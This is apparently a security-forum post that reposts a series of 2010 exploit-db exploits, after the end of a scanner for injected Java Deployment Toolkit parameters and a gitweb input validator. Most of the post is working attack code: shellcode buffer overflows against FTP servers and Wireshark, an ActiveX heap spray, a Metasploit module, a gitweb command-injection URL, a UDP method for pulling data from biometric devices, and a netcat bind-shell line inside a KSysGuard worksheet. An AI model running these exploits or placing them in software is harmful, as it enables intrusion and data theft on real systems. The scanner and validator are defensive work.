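            return "extra arguments injected: " + " ".join(opts)
        return "whitespace splits the value into extra javaws arguments"
    if UNC_RE.search(v):
        return "UNC path where a URL is expected"
    return ""


def scan_html(html: str) -> List[Tuple[str, str, str]]:
    """(where, value, reason) for every injected launch parameter in html."""
    findings = []
    for m in ATTR_RE.finditer(html):
        reason = judge_launch_value(m.group(3))
        if reason:
            findings.append((m.group(1).lower(), m.group(3), reason))
    for m in PARAM_RE.finditer(html):
        reason = judge_launch_value(m.group(3))
        if reason:
            findings.append(("param " + m.group(1).lower(), m.group(3), reason))
    for m in LAUNCH_RE.finditer(html):
        reason = judge_launch_value(m.group(2))
        if reason:
            findings.append(("launch()", m.group(2), reason))
    return findings


def mentions_deployment_toolkit(html: str) -> bool:
    """True if the page instantiates the toolkit control by CLSID or MIME type."""
    low = html.lower()
    return any(marker in low for marker in TOOLKIT_MARKERS)


# Constructed sample page (not from the advisories): one clean embed, one
# <param> carrying -J-XXaltjvm, and a launch() call with -J-jar on a UNC path.
SAMPLE_HTML = r"""
<embed type="application/x-java-applet;jpi-version=1.6.0_19" width="0" height="0"
       launchjnlp="http://example.invalid/app.jnlp" docbase="http://example.invalid/" />
<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0">
  <param name="launchjnlp" value="http://example.invalid/app.jnlp">
  <param name="docbase" value="http://example.invalid/ -J-XXaltjvm=\\attacker.controlled\evil">
</object>
<script>
  var o = document.createElement("object");
  o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
  o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
</script>
"""
```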
#2 xp-10 (Active DeveloPer)
Reply: Miscellaneous vulnerabilities, posted 22-Apr-2010, 01:20 AM
# title: Easy~ftp server v1.7.0.2 (http) remote bof exploit
# edb-id: 11500
# cve-id: ()
# osvdb-id: ()
# author: The g0bl!n
# published: 2010-02-18
# verified: Yes
# download exploit code
# download vulnerable app

view sourceprint?# exploit title: Easy~ftp server v1.7.0.2 (http) remote bof exploit

# date: 18-02-2010

# author: The g0bl!n

# software link: http://cdnetworks-us-2.dl.sourceforg...vr-1.7.0.2.zip

# code :

#!/usr/bin/python



import sys

import socket

import base64



if len(sys.argv) != 4:

Print "\n*********************************************** *****"

print "[*] easy~ftp server v1.7.0.2 (http) remote bof exploit\n"

print "[*] usage : ./sploit.py <target_ip> <user> <password>\n"

print "[*] example : ./sploit.py 192.168.1.3 anonymous w00t\n"

print "************************************************* ****"

sys.exit(0)



user = sys.argv[2]

pwd = sys.argv[3]

auth = base64.b64encode(user+":"+pwd)



# win32_exec - EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x44\x7a\x32\x37\x44\x7a\x32\x37"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x50\x42\x30\x42\x30\x4b\x58\x45\x34\x4e\x43\x4b\x38\x4e\x47"
"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x48"
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x53\x4b\x58"
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x45\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x58"
"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x30\x4b\x54"
"\x4b\x58\x4f\x45\x4e\x41\x41\x50\x4b\x4e\x4b\x48\x4e\x51\x4b\x58"
"\x41\x50\x4b\x4e\x49\x58\x4e\x35\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x56\x4b\x48\x42\x54\x42\x43\x45\x58\x42\x4c\x4a\x57"
"\x4e\x50\x4b\x58\x42\x54\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b"
"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x43"
"\x48\x4f\x42\x46\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
"\x42\x35\x4a\x56\x50\x57\x4a\x4d\x44\x4e\x43\x37\x4a\x56\x4a\x59"
"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x46"
"\x4e\x36\x43\x36\x42\x50\x5a")



egghunter=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x44\x7a\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")



buf = "\x61"*268

buf += "\xf0\x69\x83\x7c" #call esp xp sp3

buf += "\x63"*8

buf += egghunter



head = "GET /list.html?path="+buf+" HTTP/1.1\r\n"
head += "Host: "+shellcode+"\r\n"
head += "Authorization: Basic "+auth+"\r\n"



try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1], 8080))
    s.send(head + "\r\n")
    print "[x] payload sent, waiting for shellcode..."
    s.close()
except:
    print "error!"

# title: Gitweb v1.5.2 remote command execution
# edb-id: 11497
# cve-id: (2008-5516)
# osvdb-id: ()
# author: S2 crew
# published: 2010-02-18
# verified: No
# download exploit code
# download n/a

# exploit title: Gitweb remote command execution

# date: 2009.06.19

# author: S2 crew [hungary]

# software link: -

# version: Git 1.5.2

# tested on: Debian linux, git 1.5.2

# cve: CVE-2008-5516 - CVE-2008-5517



# code:



# the cgi script doesn't show the command output *blind command execution ;)*

# vulnerable functions in gitweb.cgi: git_snapshot(), git_search(), git_object()





sub git_object {
    # object is defined by:
    # - hash or hash_base alone
    # - hash_base and file_name
    my $type;

    # - hash or hash_base alone
    if ($hash || ($hash_base && !defined $file_name)) {
        my $object_id = $hash || $hash_base;

        my $git_command = git_cmd_str();
        # Single-string pipe open: Perl hands the whole line to /bin/sh, so
        # whatever arrived in the h/hb parameter becomes part of a shell command.
        open my $fd, "-|", "$git_command cat-file -t $object_id 2>/dev/null"
            or die_error('404 Not Found', "Object does not exist");
        $type = <$fd>;
        chomp $type;
        close $fd
            or die_error('404 Not Found', "Object does not exist");

    # - hash_base and file_name
    # ... (rest of the function is not reproduced in the advisory)



# - hash_base and file_name



# example

http://server/cgi-bin/gitweb.cgi?p=sample.git/.git;a=object;f=program.c;h=e69de29bb2d1d6434b8b29ae775ad8c2e48c5391|`touch$IFS/tmp/file.txt`|;hb=9adaf5b35bb6415497d23f089660567227ea3785
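As an added defensive counterpart (this is example code written for this page, not gitweb's own code and not part of the advisory), the following Python allowlist-validates the h, hb and f parameters the advisory names and builds the cat-file invocation as an argv list so no shell is involved; the regexes, function names and CHECKS table are assumptions of the example.

```python
import re
import subprocess
from urllib.parse import unquote

# Added example, not gitweb's own code. The gitweb excerpt above interpolates
# a request parameter into a shell command line:
#     "$git_command cat-file -t $object_id 2>/dev/null"
# so the h/hb values reach /bin/sh unfiltered. The defensive counterpart is
# (1) allowlist-validate every parameter that names an object or a file and
# (2) pass the git invocation as an argv list so no shell is involved.
# The regexes, function names and CHECKS table are assumptions of this example.

OBJECT_ID_RE = re.compile(r"^[0-9a-f]{40}$")                      # full SHA-1 object name
REFNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._/-]{0,254}$")   # conservative ref name
FILE_NAME_RE = re.compile(r"^[^\x00-\x1f/][^\x00-\x1f]{0,1023}$")  # relative, no control chars


def is_safe_object_id(value):
    """Accept a 40-hex SHA-1 or a plain ref name such as refs/heads/master.
    Pipes, backticks, '$', ';', whitespace and '..' never pass."""
    if not value:
        return False
    if OBJECT_ID_RE.match(value.lower()):
        return True
    return bool(REFNAME_RE.match(value)) and ".." not in value and not value.endswith("/")


def is_safe_file_name(value):
    """A path inside the tree: relative, no NUL/control characters, no '..' segment."""
    if not value or not FILE_NAME_RE.match(value):
        return False
    return ".." not in value.split("/")


def parse_gitweb_query(query):
    """gitweb separates parameters with ';' (its CGI layer also accepts '&')."""
    params = {}
    for pair in re.split(r"[;&]", query):
        if not pair:
            continue
        key, _, raw = pair.partition("=")
        params[unquote(key)] = unquote(raw)
    return params


# Which check applies to which gitweb parameter (h/hb name objects, f a file).
CHECKS = {"h": is_safe_object_id, "hb": is_safe_object_id, "f": is_safe_file_name}


def rejected_params(params):
    """Names of parameters that fail their allowlist, in request order."""
    return [name for name, value in params.items()
            if name in CHECKS and not CHECKS[name](value)]


def build_cat_file_argv(git_command, object_id):
    """argv for 'git cat-file -t <id>': validated first, and a list, so no shell."""
    if not is_safe_object_id(object_id):
        raise ValueError("rejected object id: %r" % (object_id,))
    return [git_command, "cat-file", "-t", object_id]


def object_type(git_command, object_id, cwd=None):
    """Run the validated argv without a shell; return the object type or None."""
    proc = subprocess.run(build_cat_file_argv(git_command, object_id),
                          capture_output=True, text=True, cwd=cwd)
    return proc.stdout.strip() if proc.returncode == 0 else None
```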

# title: Wireshark 1.2.5 lwres getaddrbyname bof - calc.exe
# edb-id: 11453
# cve-id: ()
# osvdb-id: ()
# author: Nullthreat and pure|hate
# published: 2010-02-15
# verified: Yes
# download exploit code
# download n/a

#!/usr/bin/env python

# wireshark 1.2.5 lwres getaddrbyname stack-based buffer overflow

# discovered by babi

# reference: http://www.exploit-db.com/exploits/11288

# exploit dev by nullthreat & pure|hate



import socket, sys



try:
    host = sys.argv[1]
except:
    print "usage: " + sys.argv[0] + " <host>"
    exit(2)



port = 921

addr = (host, port)



leng = 9150

high = int(leng / 256)

low = leng & 255



crash = ("a" * 2128)



# short jump

jmp = "\x90\x90\x06\xeb"



# pop/pop/ret in pcre3 0x61b4121b

ppr = "\x1b\x12\xb4\x61"



nop = ("\x90" * 24)



# 224 bytes = calc.exe

shellcode = (
"\xbf\x86\x0a\x33\xa0\x2b\xc9\xda\xd9\xd9\x74\x24\xf4\xb1"
"\x32\x5e\x31\x7e\x11\x03\x7e\x11\x83\xc6\x82\xe8\xc6\x5c"
"\x62\x65\x28\x9d\x72\x16\xa0\x78\x43\x04\xd6\x09\xf1\x98"
"\x9c\x5c\xf9\x53\xf0\x74\x8a\x16\xdd\x7b\x3b\x9c\x3b\xb5"
"\xbc\x10\x84\x19\x7e\x32\x78\x60\x52\x94\x41\xab\xa7\xd5"
"\x86\xd6\x47\x87\x5f\x9c\xf5\x38\xeb\xe0\xc5\x39\x3b\x6f"
"\x75\x42\x3e\xb0\x01\xf8\x41\xe1\xb9\x77\x09\x19\xb2\xd0"
"\xaa\x18\x17\x03\x96\x53\x1c\xf0\x6c\x62\xf4\xc8\x8d\x54"
"\x38\x86\xb3\x58\xb5\xd6\xf4\x5f\x25\xad\x0e\x9c\xd8\xb6"
"\xd4\xde\x06\x32\xc9\x79\xcd\xe4\x29\x7b\x02\x72\xb9\x77"
"\xef\xf0\xe5\x9b\xee\xd5\x9d\xa0\x7b\xd8\x71\x21\x3f\xff"
"\x55\x69\xe4\x9e\xcc\xd7\x4b\x9e\x0f\xbf\x34\x3a\x5b\x52"
"\x21\x3c\x06\x39\xb4\xcc\x3c\x04\xb6\xce\x3e\x27\xde\xff"
"\xb5\xa8\x99\xff\x1f\x8d\x55\x4a\x3d\xa4\xfd\x13\xd7\xf4"
"\x60\xa4\x0d\x3a\x9c\x27\xa4\xc3\x5b\x37\xcd\xc6\x20\xff"
"\x3d\xbb\x39\x6a\x42\x68\x3a\xbf\x21\xef\xa8\x23\xa6\xe5"
)



crash2 = ("\xcc" * 6752)



data = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01"
data += "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"

data += "\x00\x00\x00\x01"

data += chr(high) + chr(low) + crash + jmp + ppr + nop + shellcode + crash2 + "\x00\x00"



udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
    udps.sendto(data, addr)
except:
    print "can't lookup host"
    exit(1)



udps.close()

exit(0)


# title: Argosoft ftp server .net v.1.0.2.1 directory traversal vulnerability
# edb-id: 11765
# cve-id: ()
# osvdb-id: ()
# author: Dmnt
# published: 2010-03-15
# verified: Yes
# download exploit code
# download vulnerable app

# exploit title: Argosoft ftp server .net v.1.0.2.1 directory traversal

# date: 16.03.2010

# author: Dmnt

# software link: http://www.argosoft.com/files/apps/ftpserversetup.msi

# version: Argosoft ftp server .net v.1.0.2.1

# tested on: Windows 7

# code :

CWD ...
250 requested file action ok, completed
XPWD
257 "/.../" is working directory
CWD ...
250 requested file action ok, completed
XPWD
257 "/.../.../" is working directory


# title: Liquid xml studio 2010 <= v8.061970 - (ltxmlcomhelp8.dll) openfile() remote 0day overflow exploit
# edb-id: 11750
# cve-id: ()
# osvdb-id: ()
# author: Mr_me
# published: 2010-03-15
# verified: Yes
# download exploit code
# download vulnerable app

<html>

<!--

|------------------------------------------------------------------|

| __ __ |

| _________ ________ / /___ _____ / /____ ____ _____ ___ |

| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |

| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |

| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |

| |

| http://www.corelan.be:8800 |

| security@corelan.be |

| |

|-------------------------------------------------[ eip hunters ]--|



# liquid xml studio 2010 <= v8.061970 - (ltxmlcomhelp8.dll) openfile() remote 0day heap overflow exploit

# found by: Steven seeley (mr_me) http://net-ninja.net/

# homepage: http://www.liquid-technologies.com/

# download: http://www.liquid-technologies.com/download.aspx

# tested on: Windows xp sp3 (ie 6 & 7)

# greetz: Corelan security team

# http://www.corelan.be:8800/index.php...-team-members/

# reference: http://www.exploit-db.com/exploits/7402

# thanks to e.wizz! & shinnai for the reliable js code

# ######################################################################################################

# script provided 'as is', without any warranty.

# use for educational purposes only.

# do not use this code to do anything illegal !

#

# note : You are not allowed to edit/modify this code.

# if you do, corelan cannot be held responsible for any damages this may cause.



! Marked safe for scripting !



~~~~~~~ liquid xml customers ~~~~~~~

http://www.liquid-technologies.com/customers.aspx



liquid xml studio is being used by thousands of organisations around the globe including many ftse

100 and fortune 100 companies, as part of their business critical projects.



- australian dod

- us dod

- federal department of foreign affairs

- nsa

- us army material command

- bank of america

- american express

- hsbc bank

- merrill lynch

- microsoft corporation

- cisco systems

- etc



enough said.

-->

<object classid='clsid:e68e401c-7db0-4f3a-88e1-159882468a79' id='boom' ></object>

<script language="javascript" defer>



//calc.exe

var scode = unescape("%ue860%u0000%u0000%u815d%u06ed%u0000%u8a00%u1285%u0001%u0800" +
"%u75c0%ufe0f%u1285%u0001%ue800%u001a%u0000%uc009%u1074%u0a6a" +
"%u858d%u0114%u0000%uff50%u0695%u0001%u6100%uc031%uc489%uc350" +
"%u8d60%u02bd%u0001%u3100%ub0c0%u6430%u008b%u408b%u8b0c%u1c40" +
"%u008b%u408b%ufc08%uc689%u3f83%u7400%uff0f%u5637%u33e8%u0000" +
"%u0900%u74c0%uab2b%ueceb%uc783%u8304%u003f%u1774%uf889%u5040" +
"%u95ff%u0102%u0000%uc009%u1274%uc689%ub60f%u0107%uebc7%u31cd" +
"%u40c0%u4489%u1c24%uc361%uc031%uf6eb%u8b60%u2444%u0324%u3c40" +
"%u408d%u8d18%u6040%u388b%uff09%u5274%u7c03%u2424%u4f8b%u8b18" +
"%u205f%u5c03%u2424%u49fc%u407c%u348b%u038b%u2474%u3124%u99c0" +
"%u08ac%u74c0%uc107%u07c2%uc201%uf4eb%u543b%u2824%ue175%u578b" +
"%u0324%u2454%u0f24%u04b7%uc14a%u02e0%u578b%u031c%u2454%u8b24" +
"%u1004%u4403%u2424%u4489%u1c24%uc261%u0008%uc031%uf4eb%uffc9" +
"%u10df%u9231%ue8bf%u0000%u0000%u0000%u0000%u9000%u6163%u636c" +
"%u652e%u6578%u9000");

var sslide = unescape("%u9090%u9090");

var heapsa = 0x0c0c0c0c;

function tryme()
{
    var buffsize = 10000;
    var x = unescape("%0a%0a%0a%0a");
    while (x.length<buffsize) x += x;
    x = x.substring(0,buffsize);
    boom.openfile(x, 1);
}

function getsslide(sslide, sslidesize)
{
    while (sslide.length*2<sslidesize)
    {
        sslide += sslide;
    }
    sslide = sslide.substring(0,sslidesize/2);
    return (sslide);
}

var heapbs = 0x400000;
var sizehdm = 0x5;
var plsize = (scode.length * 2);
var sslidesize = heapbs - (plsize + sizehdm);
var heapblocks = (heapsa+heapbs)/heapbs;
var memory = new Array();
sslide = getsslide(sslide,sslidesize);
for (i=0;i<heapblocks;i++)
{
    memory[i] = sslide + scode;
}

</script>

<body onload="javascript: return tryme();">
<center>
<p>~ mr_me presents ~</p>
<p><b>liquid xml studio 2010 &lt;= v8.061970 - (ltxmlcomhelp8.dll) openfile() remote 0day heap overflow exploit</b></p>
</center>

</body>

</html>

# title: Open & compact ftpd 1.2 pre-authentication buffer overflow (meta)
# edb-id: 11742
# cve-id: ()
# osvdb-id: ()
# author: Blake
# published: 2010-03-15
# verified: Yes
# download exploit code
# download vulnerable app

# exploit title: Open & compact ftpd 1.2 pre-authentication buffer overflow msf

# date: March 14, 2010

# author: Blake

# version: 1.2

# tested on: Xp sp3



The exploit causes the FTP server to crash, so adduser etc. payloads are most effective.







require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = AverageRanking

    include Msf::Exploit::Remote::Ftp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Open & Compact FTPd 1.2 Pre-Authentication Buffer Overflow',
            'Description'    => %q{
                This module exploits a stack overflow in the USER verb in Open & Compact FTPd version 1.2.
                The program will crash once the payload is sent, so bind shell payloads are not effective.
            },
            'Author'         => 'blake',
            'License'        => MSF_LICENSE,
            'Version'        => 'Version 1',
            'References'     =>
                [
                    [ 'EDB-ID', '11420'],
                    [ 'URL', 'http://www.exploit-db.com/exploits/11420' ],
                ],
            'Privileged'     => true,
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space'           => 400,
                    'BadChars'        => "\x00\x20\x0a\x0d",
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Windows XP SP2/SP3 English', { 'Ret' => 0x00202c42 } ],
                ],
            'DisclosureDate' => 'Feb 12, 2010',
            'DefaultTarget'  => 0))
    end

    def exploit
        connect

        sploit = "\x42\x2c\x20" * 199
        sploit << make_nops(10)
        sploit << payload.encoded

        print_status("Trying target #{target.name}...")

        login = "USER " + sploit + "\r\n"
        login << "PASS " + rand_text_alphanumeric(12)

        sock.put(login + "\r\n")

        handler
        disconnect
    end

end


# title: ZKSoftware biometric attendance management hardware [MIPS] improper authentication
# edb-id: 11822
# cve-id: ()
# osvdb-id: ()
# author: Fb1h2s
# published: 2010-03-20
# verified: No
# download exploit code
# download n/a

# exploit title: ZKSoftware biometric attendance management hardware [MIPS] improper authentication.

# date: 20-3-2010

# author: Fb1h2s

# software link: http://www.esslindia.com/install/etimetrack.zip

# version: V2

# tested on:

# category: Remote

# code : Advisory



###################################################################################

ZKSoftware biometric attendance management hardware [MIPS] improper authentication.

1) ZKSoftware is a biometric system which uses biometrics (fingerprints) to authenticate and manage employee details, and to organise the attendance register.
This system is widely used in many countries, but is marketed by a different company depending on the country.

ZKSoftware's IP-based attendance management system with the following series "zk5000-zk9000" allows remote IP-based management of the hardware via the UDP protocol,
but without any proper authentication.

You could custom-create commands and send them to UDP port 4370 of the hardware and download information from the system; alternatively you could download a copy of their
remote hardware management software from one of their vendors' web sites and use it to steal data from the hardware.

Essl is the company which markets this product in India, and its website provides a free download of the management software.

2) The eTimeTrack software which is used to manage the hardware marketed by Essl uses an encryption, and the encryption key is hard-coded in the program.



Exploiting the issue using scapy

Response from custom-made scapy packets:

###################################################################################################
fb1h2s@fb1h2s:~$ sudo scapy
[sudo] password for adminuser:
/var/lib/python-support/python2.5/scapy.py:3118: Warning: 'with' will become a reserved keyword in Python 2.6
/var/lib/python-support/python2.5/scapy.py:3120: Warning: 'with' will become a reserved keyword in Python 2.6
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump()
Welcome to Scapy (v1.1.1 / -)
>>> ip=IP("192.168.*.*")
>>> udp=UDP(sport=4371,dport=4370)
>>> payload="customcommands"
>>> packet=ip/udp/payload
>>> sniff
<function sniff at 0x9f0333c>
>>> sr1(packet)
Begin emission:
Finished to send 1 packets.
You could possibly get anything you want from the system
bingo :D



I am including a dump of the UDP communication with the hardware, and the data leakage as a result of improper authentication.






The current vulnerability is checked and verified with the zk5000 hardware model; possibly all other versions would be vulnerable.

###################################################################################################
# greetz to all darkc0de, andhra hackers and ICW members [indian cyber warriors]
#thanks : Mr bond,beenu,wipu,godwinaustin,the_empty,hg_h@x0r,r45c4l,it_security,eberly,harin,manoj
#shoutz : Smart_hax0r,j4ckh4x0r,41w@r10r,hackuin
#catch us at www.andhrahackers.com or www.teamicw.in

# title: Edisplay personal ftp server 1.0.0 multiple post-authentication stack bof
# edb-id: 11820
# cve-id: ()
# osvdb-id: ()
# author: Corelanc0d3r
# published: 2010-03-20
# verified: Yes
# download exploit code
# download vulnerable app

# exploit title : Edisplay personal ftp server 1.0.0 multiple post-authentication stack bof

# type of sploit: Remote code execution

# bug found by : Loneferret (march 19, 2010)

# reference : http://www.exploit-db.com/exploits/11810

# exploit date : March 20, 2010

# author : Corelanc0d3r

# version : 1.0.0

# os : Windows

# tested on : Xp sp3 en (virtualbox)

# type of vuln : Seh

# greetz to : Loneferret, dookie2000ca and of course my friends at corelan security team

# http://www.corelan.be:8800/index.php...-team-members/

# ----------------------------------------------------------------------------------------------------

# script provided 'as is', without any warranty.

# use for educational purposes only.

# do not use this code to do anything illegal !

#

# note : You are not allowed to edit/modify this code.

# if you do, corelan cannot be held responsible for any damages this may cause.

#

# ----------------------------------------------------------------------------------------------------

#

# before we begin : If you liked my quickzip.exe exploit

# then you will certainly love this one too :-)

#

# ----------------------------------------------------------------------------------------------------

#

#

# code :

print "|------------------------------------------------------------------|\n";

print "| __ __ |\n";

print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";

print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";

print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";

print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n";

print "| |\n";

print "| http://www.corelan.be:8800 |\n";

print "| |\n";

print "|-------------------------------------------------[ eip hunters ]--|\n\n";

print " --==[ exploit for edisplay personal ftp server 1.0.0]==-- \n";

print " author : Corelanc0d3r\n\n";





use IO::Socket;
if ($#ARGV ne 3) {
    print " usage: $0 <targetip> <targetport> <user> <password>\n";
    exit(0);
}

my $user=$ARGV[2];
my $pass=$ARGV[3];



print " [+] preparing payload\n";

#basereg edi - custom messagebox payload

my $sc = "w00tw00t".

"wyiiiiiiiiiiiiiiii7qzjaxp0a0akaaq2ab2bb0bbabx ".

"p8abujin98kmkn9qdetjttqzrnrcjuaxi54lkbqfplkpv ".

"vlnkqfgllkw6thlkqngplkp6fxpotxd5zsryeq8qko8aa ".

"plkplututnkw5wllksduuchs1yznk3zvxlk1j5pwqxkzc ".

"p7qylkp4nkfa8ndqkouaypklnlndkppt4jjaxotmfajgi ".

"yxqkokoko7kslwt6hpuinnkcjgtuqzkbflk6lpknkcj7l ".

"fajklkvdlkc1kxk9qtetulsqksnrthwyxtk9kuoykrcxl ".

"npnfnxl62kxolkoio9ok9reutmk3nihkr3cowulutprjh ".

"lkkokoiooyw5wxcxrlblq0koqxfswbvnctu8qet3cut2m ".

"xclvd6joyivqfkosevdoyyrrpokoxlbpmmlow5lddrrjh ".

"qnko9o9ophtn6nfnv8phdp0decsbu8blcqrncsqxpcror ".

"rsutqkkmx1ltdtoniysrhtnvnqhup3xq0gk4i6n3xbgsq ".

"1ypnphsysduppaqxstqycteptqximxpltdfrmykqp1zrs ".

"b3cpqrrkon0dqipbpkoqeexa";



#custom encoded egg hunter

#boy i love pvefindaddr !

# !pvefindaddr encode ascii <bytes>

#i only had to fix bad chars

#but we need 5c to trigger seh at correct offset

my $decoder=

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x2e\x5d\x55\x5d".

"\x2d\x2d\x5d\x55\x5d".

"\x2d\x30\x5e\x55\x5d".

"\x50".

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x70\x2d\x5c\x6f". #we need these 5c's !!

"\x2d\x70\x2c\x5c\x6f". #we need these 5c's !!

"\x2d\x71\x30\x5d\x71".

"\x50".

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x45\x2e\x23\x56".

"\x2d\x45\x2d\x23\x56".

"\x2d\x46\x30\x2e\x59".

"\x50".

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x5b\x6c\x2d\x45".

"\x2d\x5b\x6c\x2d\x45".

"\x2d\x5b\x6e\x2d\x45".

"\x50".

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x41\x53\x37\x2e".

"\x2d\x41\x53\x37\x2d".

"\x2d\x42\x54\x37\x30".

"\x50".

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x54\x37\x66\x45".

"\x2d\x54\x37\x66\x45".

"\x2d\x56\x39\x66\x46".

"\x50".

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x50\x3f\x39\x31".

"\x2d\x50\x3f\x39\x31".

"\x2d\x51\x3f\x3b\x33".

"\x50".

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x33\x2a\x67\x55".

"\x2d\x33\x2a\x67\x55".

"\x2d\x34\x2a\x67\x55".

"\x50".

"\x75\x58"; #jump to decoded opcode





my $buffer = "a" x 45;

my $pad=("d" x 30);

my $nseh= "\x61\x42\x42\x42";

my $seh=pack('v',0x202d2b3c); #comctl32.ocx 0x202d2b3c

#encoded jumpback code to jump to encoded egg hunter

#pfew that's a mouthful

my $jumpback="\x50\x5c";

$jumpback=$jumpback."\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x55\x55\x55\x5e".

"\x2d\x55\x55\x55\x5e".

"\x2d\x56\x55\x56\x60".

"\x50".

"\x25\x4a\x4d\x4e\x55".

"\x25\x35\x32\x31\x2a".

"\x2d\x2a\x5c\x59\x54".

"\x2d\x2a\x5c\x59\x54".

"\x2d\x2b\x5d\x59\x56".

"\x50";

my $rest = "a" x (1000 - length($buffer.$nseh.$seh.$decoder.$pad.$sc.$jumpback)-20-5);
#align eax first
my $aligneax="\x52\x58\x2d\x35\x55\x55\x55\x2d\x35\x55\x55\x55\x2d\x35\x55\x55\x55";
my $payload=$buffer."cccccccccccccccccc".$decoder.$pad.$nseh.$seh."bbb".$aligneax.$jumpback.$rest.$sc;



print " [+] connecting to server $ARGV[0] on port $ARGV[1]\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => $ARGV[1],
                              Proto    => 'tcp');

$ftp = <$sock> || die " [!] *** unable to connect ***\n";
print " ** $ftp";
print " [+] logging in (user $user)\n";
print $sock "USER $user\r\n";
$ftp = <$sock>;
print " ** $ftp";
print $sock "PASS $pass\r\n";
$ftp = <$sock>;
print " ** $ftp";
print " [+] sending payload (" . length($payload)." bytes)\n";
print $sock "RMD ".$payload."\r\r\n";
print $sock "QUIT\r\n";

print " [+] shellcode size : " . length($sc)." bytes\n";



# title: Kde <= 4.4.1 ksysguard rce via cross application scripting
# edb-id: 11817
# cve-id: ()
# osvdb-id: ()
# author: Emgent
# published: 2010-03-20
# verified: Yes
# download exploit code
# download n/a

# exploit title: Ksysguard rce via cross application scripting

# date: 2010 03 20

# author: Emanuele 'emgent' gentili

# code: http://www.backtrack.it/~emgent/expl...rd_rce_cas.txt

# version: <= 4.4.1

# cve : N/a

# vendor: http://www.kde.org

# video: http://www.backtrack.it/~emgent/vide...owning_kde.mov

# about cas: http://en.wikipedia.org/wiki/cross_a...tion_scripting

# http://it.wikipedia.org/wiki/cross_a...tion_scripting







halfapple:~ emanuelegentili$ cat ph33r.sgrd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE KSysGuardWorkSheet>
<WorkSheet title="she" interval="2" locked="0" rows="2" columns="2" >
<host command="nc -l -p31337 -e /bin/bash" /> </WorkSheet>
halfapple:~ emanuelegentili$


# title: Mx simulator server remote buffer overflow poc
# edb-id: 11857
# cve-id: ()
# osvdb-id: ()
# author: Salvatore fresta
# published: 2010-03-23
# verified: Yes
# download exploit code
# download vulnerable app

/*

mx simulator server 2010-02-06 remote buffer overflow poc

